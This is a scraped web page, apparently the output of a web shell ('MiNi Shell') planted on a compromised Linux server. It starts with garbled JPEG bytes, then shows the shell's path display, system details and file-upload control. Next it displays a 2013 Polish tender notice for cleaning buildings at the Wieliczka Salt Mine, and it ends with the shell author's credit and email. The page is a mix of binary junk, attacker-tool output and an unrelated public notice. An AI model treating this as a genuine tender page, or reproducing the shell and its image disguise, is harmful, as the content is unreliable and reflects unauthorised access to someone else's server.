JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130823/167867-N-2013.html

<p class="kh_header"><b>Wieliczka: Utrzymanie czystości w budynkach Kopalni Soli Wieliczka S.A.</b><br>
<b>Numer ogłoszenia: 167867 - 2013; data zamieszczenia: 23.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kopalnia Soli "Wieliczka" Spółka Akcyjna , Park Kingi 1, 32-020 Wieliczka, woj. małopolskie, tel. 12 278711, 012 2787132, faks 02 2787110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopalniawieliczka.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Górnictwo-Spółka Akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości w budynkach Kopalni Soli Wieliczka S.A..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa utrzymania czystości w budynkach Kopalni Soli Wieliczka S.A. w następującym zakresie:
a) usługa wykonywana 1 raz na dobę obejmująca: pomieszczenia biurowe, produkcyjne, higieniczno-sanitarne o łącznej powierzchni 4 600 m2 w tym 500 m2 do realizacji na zlecenie Zamawiającego w ramach prawa opcji,
b) usługa wykonywana 3 razy na dobę w pomieszczeniach cechowni i towarzyszących o powierzchni 796 m2  
c) usługa wykonywana 1 raz na dobę w pomieszczeniach cechowni i towarzyszących o powierzchni 49 m2  
d) usługa czyszczenia okien o łącznej powierzchni 643,81 m2 wykonywana jeden raz na kwartał,
e) usługa czyszczenia żaluzji i rolet tekstylnych o łącznej powierzchni 523 m2 wykonywana jeden raz w roku.
2. Prawo opcji:
Zamawiający zastrzega, że będzie miał prawo zlecić, w zależności od swoich potrzeb, utrzymanie czystości w budynkach Kopalni Soli Wieliczka S.A., o których mowa w pkt 1. ppkt. a,  o łącznej powierzchni 500 m2.
3. Szczegółowe wykazy budynków, pomieszczeń, okien, rolet i żaluzji a także rodzajów podlóg zawierają załączniki do SIWZ :
3.1. załącznik nr 1 do SIWZ zawiera dokładny wykaz budynków wraz z powierzchniami do utrzymania czystości,
3.2 załącznik nr 2 do SIWZ zawiera dokładny wykaz pomieszczeń cechowni wraz z powierzchniami do utrzymania czystości,
3.3. załącznik nr 3 do SIWZ zawiera wykaz okien wraz z powierzchniami oraz wykazem rolet i żaluzji,
3.4 załącznik nr 4 do SIWZ zawiera wykaz podłóg z podziałem na rodzaje i przyporządkowane im wielkości powierzchni.
4. Szczegółowy opis zakresu i przedmiotu zamówienia:
4.1. W ramach usługi określonej w pkt 1. ppkt a obejmującej pomieszczenia wyszczególnione w załączniku nr 1 do SIWZ Wykonawca będzie zobowiązany do:
a) utrzymania porządku i czystości wszystkich powierzchni i wyposażenia znajdującego się w pomieszczeniach podlegających sprzątaniu tj. ścian, podłóg, sufitów, parapetów itd. oraz wyposażenia w zakresie:
- wyposażenia meblowego
- sprzętu komputerowego, 
- aparatów  telefonicznych,
- kserokopiarek.
b) prania wykładzin podłogowych znajdujących się w tych pomieszczeniach bez ich  zdejmowania z podłogi,
- mycia okien znajdujących się w pomieszczeniach,
- czyszczenia żaluzji znajdujących się w pomieszczeniach - w ramach tej usługi Wykonawca jest zobowiązany do zdejmowania i zakładania żaluzji,
Zestawienie okien oraz rolet i żaluzji zawiera załącznik nr 3 do SIWZ.
- mycia lamp znajdujących się w pomieszczeniach,
- odkurzania biur, mebli i krzeseł, zamiatania i mycia podłóg, mycia mebli (szafy, biurka, półki), polerowania podłóg PCV, mycia listew ściennych i grzejników, opróżniania pojemników na śmieci z wymianą worków,
- czyszczenia SUCHĄ ścierczka z mikrofibry: sprzętu komputerowego, kserokopiarek, aparatów telefonicznych
- mycia i czyszczenia sprzętu AGD,
- mycia i dezynfekcji umywalek, muszli i pisuarów, czyszczenia luster, uzupełniania papieru toaletowego, ręczników papierowych mydła, czyszczenia pojemników na: mydło, ręczniki  papierowe i papier  toaletowy.
4.2. Wykonawca będzie zobowiązany do:
1) mycia okien 1 raz na kwartał. Konkretny termin mycia okien Wykonawca będzie zobowiązany ustalić z Zamawiającym,
2) prania wykładzin raz w ciągu roku, w miesiącach letnich: lipiec lub sierpień. Konkretny termin prania wykładzin Wykonawca będzie zobowiązany ustalić z Zamawiającym,
3) czyszczenia żaluzji raz w ciągu roku w miesiącach wakacyjnych: lipiec lub sierpień. Konkretny termin czyszczenia żaluzji Wykonawca będzie zobowiązany ustalić z Zamawiającym,
4.3. W ramach usługi określonej w pkt 1. ppkt b i c obejmującej pomieszczenia wyszczególnione w załączniku nr 2 do SIWZ Wykonawca będzie zobowiązany do:
a) utrzymania porządku  i czystości wszystkich powierzchni znajdujących się w pomieszczeniach podlegających sprzątaniu tj. ścian, podłóg, sufitów, parapetów itd. oraz całego wyposażenia znajdującego się w tych pomieszczeniach biurowych 
i sanitarnych,
b) -	mycia okien,
- czyszczenia żaluzji - w ramach tej usługi Wykonawca jest zobowiązany do           zdejmowania i zakładania żaluzji,
Zestawienie okien oraz rolet i żaluzji zawiera załącznik nr 3 do SIWZ
- mycia lamp znajdujących się w tych pomieszczeniach,
- mycia ścian, na których położona jest glazura 3 razy na dobę w dni robocze od poniedziałku do piątku,
- dezynfekowania pomieszczeń sanitarnych przylegających do cechowni 3 razy na dobę w dni robocze od poniedziałku do piątku.
4.4. Wykonawca będzie zobowiązany do:
1) mycia okien w pomieszczeniach cechowni oraz towarzyszących 1 raz na kwartał. Konkretny termin mycia okien Wykonawca będzie zobowiązany ustalić z Zamawiającym,
2) czyszczenia żaluzji w pomieszczeniach cechowni oraz towarzyszących raz w ciągu roku w miesiącach letnich: lipiec, sierpień. Konkretny termin czyszczenia żaluzji Wykonawca będzie zobowiązany ustalić z Zamawiającym. 
4.5. Środki czystości
a) w pomieszczeniach podlegających sprzątaniu określonych w załącznikach nr 1i 2 do SIWZ, Wykonawca będzie zobowiązany uzupełniać, we własnym zakresie i na własny koszt, stosownie do potrzeb, a także przeznaczenia i wyposażenia tych pomieszczeń, środki czystości jak poniżej:
1) odświeżacze powietrza do toalet Brie sprey lub równoważne o dowolnym zapachu,
2) środki dezynfekcyjne w postaci żelu o nazwie CIF, Domestos lub równoważne,
3) kostki do toalet Bref, Domestos lub równoważne,
4) ręczniki papierowe dwuwarstwowe: Regina, Mega - Foxy lub równoważne,
5) papier toaletowy dwuwarstowy: Regina, Velvet lub równoważne,
6) worki na śmieci różnych rozmiarów dowolnej marki,
7) mydło w płynie AVEA lub dowolnej marki,
8) mydło w kostce Arko lub równoważne,
9) do mycia podłóg PCV i terakoty  płyn Ajax, Floor lub równoważne,
10) do mycia paneli płyn Panelin lub równoważne.
b) średnie miesięczne zużycie środków czystości jest następujące:
1) papier toaletowy /rolki/ - 1100szt.,
2) papier toaletowy Gigant - 150 szt.,
3) mydło w płynie - 50 l,
4) ręczniki jednorazowe - 900 szt.,
5) odświeżacze powietrza - 40 szt.,
6) kostki do toalet - 200 szt.,
7) mydło w kostkach - 20 szt.,
8) worki na śmieci -  60 l  x 50 szt - 120 op.,
9) worki na śmieci -  35l x  50 szt - 100 op.
Szczegółowe informacje dotyczące przedmiotu zamówienia i jego realizacji  zawarte zostały we wzorze umowy stanowiącym  załącznik nr 11 do specyfikacji zamieszczonej na stronie internetowej Zamawiającego www.kopalniawieliczka.eu.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.13.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości:  10 000,00 zł  należy wnieść przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udokumentowanie wykonania bądź wykonywania w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: co najmniej dwóch usług mających za przedmiot utrzymanie porządku i czystości w budynkach o wartości co najmniej: 300 000,00 zł (brutto) dla każdej z  ww. usług wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane bądź są wykonywane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udokumentowanie posiadania sprzętu niezbędnego w celu realizacji niniejszego zamówienia tj. mechanicznej szorowarki wraz z informacją o podstawie do dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej, w zakresie prowadzonej działalności gospodarczej w wysokości co najmniej 200 000,00 zł (polisa 
a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z przepisem art. 144 ust. 1 ustawy Prawo zamówień publicznych, dopuszcza się możliwość dokonania istotnych zmian postanowień umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie, o którym mowa w pkt 2, z wyłączeniem takich zmian, których dokonanie spowodowałoby rozszerzenie przedmiotu umowy poza zakres przedmiotowy oferty, na podstawie której dokonano wyboru Wykonawcy.
2. Dopuszcza się możliwość dokonania istotnych zmian postanowień umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w tym między innymi w zakresie przedmiotu umowy, terminu realizacji umowy oraz wysokości należnego Wykonawcy wynagrodzenia, w przypadku zaistnienia którejkolwiek z poniższych przyczyn:
1) przestojów i opóźnień w wykonywaniu przedmiotu umowy, zawinionych przez Zamawiającego,
2) działania siły wyższej,
3) zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy.
3. Zaistnienie przyczyn, wymienionych w pkt 2, nie powoduje powstania u żadnej ze Stron umowy, roszczenia o zmianę umowy.
4. W przypadku zaistnienia, którejkolwiek z przyczyn, wymienionych w pkt 2, każdej ze Stron umowy przysługuje prawo do wystąpienia do drugiej strony o zmianę umowy. Wystąpienie o dokonanie zmiany winno zawierać:
1) szczegółowy opis przyczyn uzasadniających zmianę umowy, 
2) uzasadnienie dokonania zmiany umowy,
3) projekt zmiany umowy.
5. Wystąpienie, o którym mowa w pkt 4 stanowi podstawę do podjęcia negocjacji w sprawie zmiany umowy.
6. Zmian umowy dokonuje się w formie aneksów, którym nadaje się kolejne numery.
7. Zmiana umowy zostaje zawarta w dniu jej podpisania przez obie strony.
8. Przepisy zawarte w powyższych ustępach nie wykluczają dokonania nieistotnych zmian postanowień umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych. Dopuszczalne będą zatem zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia publicznego nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie, czy też na wynik postępowania o udzielenie tego zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopalniawieliczka.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kopalnia Soli Wieliczka S.A., Park Kingi 1, 32-020 Wieliczka, Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2013 godzina 11:30, miejsce: Kopalnia Soli Wieliczka S.A., Park Kingi 1, 32-020 Wieliczka, Sekretariat Zarządu-budynek A parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com